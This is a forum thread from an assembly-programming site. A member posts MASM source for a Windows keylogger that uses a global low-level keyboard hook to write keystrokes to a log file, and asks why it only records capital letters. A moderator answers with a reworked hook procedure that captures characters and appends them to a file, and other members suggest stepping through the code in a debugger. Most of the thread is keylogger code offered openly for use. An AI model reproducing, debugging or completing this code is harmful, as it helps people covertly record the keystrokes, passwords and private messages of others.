WinAsm Studio, The Assembly IDE - Free Downloads, Source Code
Sponsors
Articles
Programming Quick Start
32-bit Assembler is Easy
Porting Iczelion tutorials
What is FASM
What is FASM G
Hard Drive Recovery
Wiring your own LAN
Personal menu
Welcome Guest
User:
Pass:
Register!
Resend Validation Email
 
Forum
Pages (2) [1] 2   ( Go to first unread post )

ASM Keylogger need help, he strange thing is when im invoking WriteFile in the WndProc procedure my keylogger works fine, but only get CHAR from window

polishgang
Quote Post


New Member
*

Group: Members
Posts: 4
Member No.: 25083
Joined: 3-August 09


Hello Guys i´ve got a problem with my keylogger.It only logs big letters and does not log the key ENTER. The strange thing is when im invoking WriteFile in the WndProc procedure my keylogger works fine, but only get CHAR from my window....
This is the Keyboard Proc http://msdn.microsoft.com/en-us/library/ms644984%28VS.85%29.aspx

I dont know where the problem is


Sorry for my english and CODE.
Here is my code.. hope someone can help me
Thx alot
CODE
; Autor Polish-Gangsta|Dawid


.386
.model flat,stdcall
option casemap:none
include windows.inc
include user32.inc
include gdi32.inc
includelib user32.lib    
include kernel32.inc
includelib kernel32.lib
includelib gdi32.lib

WinMain proto :DWORD,:DWORD,:DWORD,:DWORD

.const
MEMSIZE equ 65535

.DATA
ClassName db "Radonia4ever",0    
AppName db "PG greets Polska",0    
dateiname db "log.txt",0
tastaturEingaben db "Dawid",0
zeilenumbruch WORD 0A0Dh

.DATA?
hInstance HINSTANCE ?      
CommandLine LPSTR ?


hFile HANDLE ?      
hMemory HANDLE ?      
pMemory DWORD ?      
SizeReadWrite DWORD ?  

.CODE
start:

invoke GetModuleHandle, NULL    
mov hInstance,eax
mov hInstance,eax
invoke GetCommandLine    
mov CommandLine,eax
invoke WinMain, hInstance,NULL,CommandLine, SW_SHOWDEFAULT
invoke ExitProcess, eax    

KeyBoard proc nCode:DWORD, wParam:DWORD, lParam:DWORD

mov     eax, wParam
       cmp     eax, WM_KEYUP          ; only need WM_KEYDOWN
       je      next_hook  
cmp     eax, WM_SYSKEYUP      ; only Need WM_SYSKEYDOWN
       je      next_hook        
      invoke MessageBoxEx,nCode,ebx,ebx,MB_OK,LANG_GERMAN
 invoke SetFilePointer,hFile,0,0,FILE_END
.IF wParam==13    
 invoke WriteFile,hFile,ADDR zeilenumbruch,sizeOf zeilenumbruch,ADDR SizeReadWrite,0
.ELSE
 invoke WriteFile,hFile,ebx,1,ADDR SizeReadWrite,0
.ENDIF

 
     ;invoke MessageBoxEx,nCode,edi,edi,MB_OK,LANG_GERMAN

next_hook:
invoke CallNextHookEx,KeyBoard,nCode,wParam,lParam
ret
KeyBoard endp

WinMain proc hInst:HINSTANCE,hPrevInst:HINSTANCE,CmdLine:LPSTR,CmdShow:DWORD
LOCAL wc:WNDCLASSEX      
LOCAL msg:MSG
LOCAL hwnd:HWND


;Datei laden
invoke CreateFile,ADDR dateiname,\
GENERIC_WRITE ,\
FILE_SHARE_WRITE,\
NULL,OPEN_ALWAYS,FILE_ATTRIBUTE_NORMAL,\
NULL
mov hFile,eax
;invoke SetEndOfFile,hFile


invoke SetWindowsHookEx,WH_KEYBOARD_LL,addr KeyBoard,hInst,NULL;hook registrieren


mov wc.cbSize,SIZEOF WNDCLASSEX  
mov wc.style, CS_HREDRAW or CS_VREDRAW
mov wc.lpfnWndProc, OFFSET WndProc
mov wc.cbClsExtra,NULL
mov wc.cbWndExtra,NULL
push hInstance
pop wc.hInstance
mov wc.hbrBackground,COLOR_WINDOW+1
mov wc.lpszMenuName,NULL
mov wc.lpszClassName,OFFSET ClassName
invoke LoadIcon,NULL,IDI_APPLICATION
mov wc.hIcon,eax
mov wc.hIconSm,eax
invoke LoadCursor,NULL,IDC_ARROW
mov wc.hCursor,eax
invoke RegisterClassEx, addr wc  
invoke CreateWindowEx,NULL,\
ADDR ClassName,\
ADDR AppName,\
WS_OVERLAPPEDWINDOW,\
CW_USEDEFAULT,\
CW_USEDEFAULT,\
CW_USEDEFAULT,\
CW_USEDEFAULT,\
NULL,\
NULL,\
hInst,\
NULL
mov hwnd,eax
invoke ShowWindow, hwnd,CmdShow  
invoke UpdateWindow, hwnd    

.WHILE TRUE      
invoke GetMessage, ADDR msg,NULL,0,0
.BREAK .IF (!eax)
invoke TranslateMessage, ADDR msg
invoke DispatchMessage, ADDR msg
.ENDW
mov eax,msg.wParam    


ret
WinMain endp


WndProc proc hWnd:HWND, uMsg:UINT, wParam:WPARAM, lParam:LPARAM
LOCAL ps:PAINTSTRUCT
LOCAL hdc:HDC


.IF uMsg==WM_DESTROY
 invoke UnhookWindowsHookEx,KeyBoard
 invoke PostQuitMessage,NULL  
.ELSEIF uMsg==WM_KEYUP

.ELSEIF uMsg==WM_PAINT
 invoke BeginPaint,hWnd, ADDR ps
 mov hdc,eax
 invoke TextOut,hdc,0,0,ADDR wParam,sizeOf tastaturEingaben  
 invoke EndPaint,hWnd, ADDR ps
.ELSE
 invoke DefWindowProc,hWnd,uMsg,wParam,lParam; Standard Nachrichtenverarbeitung  
 ret
.ENDIF
xor eax,eax
ret
WndProc endp

invoke CloseHandle,eax
end start

Sponsored Links
PMEmail Poster
Top
ragdog
Quote Post


Extremely Active Member
******

Group: Moderators
Posts: 892
Member No.: 5019
Joined: 13-May 07


Hi

What make your ebx?

here is a simply solution

CODE
KbdProc proc nCode:DWORD,wParam:DWORD,lParam:DWORD
     invoke CallNextHookEx,hHook,nCode,wParam,lParam
     mov eax,lParam
     mov ebx,[eax+4]
     .if ebx==WM_CHAR

      invoke CreateFile,ADDR fname,FILE_APPEND_DATA, FILE_SHARE_WRITE or FILE_SHARE_READ,\
                   NULL,OPEN_ALWAYS,FILE_ATTRIBUTE_ARCHIVE ,NULL
      mov fh,eax

      mov ecx,lParam
      add ecx,8;; get pointer to ascii code of char
      mov ebx,[ecx]
      mov char,ebx
      and char,0ffh;; need first 8 bits
      .if char == 13;; enter
       mov char,10
      .elseif char == 8;; backspace
       mov char,'~'
      .endif


      invoke WriteFile,fh,addr char,1,ADDR fl,NULL

      invoke CloseHandle,fh

     .endif

     xor eax,eax
     ret
KbdProc endp
PMUsers Website
Top
polishgang
Quote Post


New Member
*

Group: Members
Posts: 4
Member No.: 25083
Joined: 3-August 09


THX RAGDOG for ur post and time!! :D nice community

i will study ur code
------------------------------------
ive tried ur code but its still the same problem.... the letters are BIG and nothing changed. :( And ive got 2 question s

QUOTE
mov ebx,[eax+4]

how do u know thats the 2nd parameter?

QUOTE
add ecx,8;; get pointer to ascii code of char

and how do u know this?

thx for reply :tup
PMEmail Poster
Top
ragdog
Quote Post


Extremely Active Member
******

Group: Moderators
Posts: 892
Member No.: 5019
Joined: 13-May 07


Let it run in a debugger and set a Bp and you see it.

This not my code i hve this found on my drive.
PMUsers Website
Top
EnFeR RoI
Quote Post


Member
**

Group: Members
Posts: 20
Member No.: 30972
Joined: 15-January 10


I think you should use OLLYDBG to understand the working of code of Keylogger project made by you.

Hope it help you!! )(
EnFeR RoI.
PMEmail Poster
Top
1 User(s) are reading this topic (1 Guests and 0 Anonymous Users)
0 Members:

Topic Options Pages (2) [1] 2  Reply to this topicStart new topicStart Poll

 

Sponsors
Computer Science

Internet
C/C++
Hardware & PC maintenance

HiEditor

General Discussions
Suggestions/Bug Reports
WinAsm Studio

General Discussions
Suggestions/Bug Reports
WinAsm Studio FAQ
Multilingual User Interface
Add-Ins
Assembly Programming

Main
Newbies
Projects
Custom Controls
Snippets
Announcements & Rules

Announcements

General

Online Degrees - Distance Learning
The Heap
Russian
Google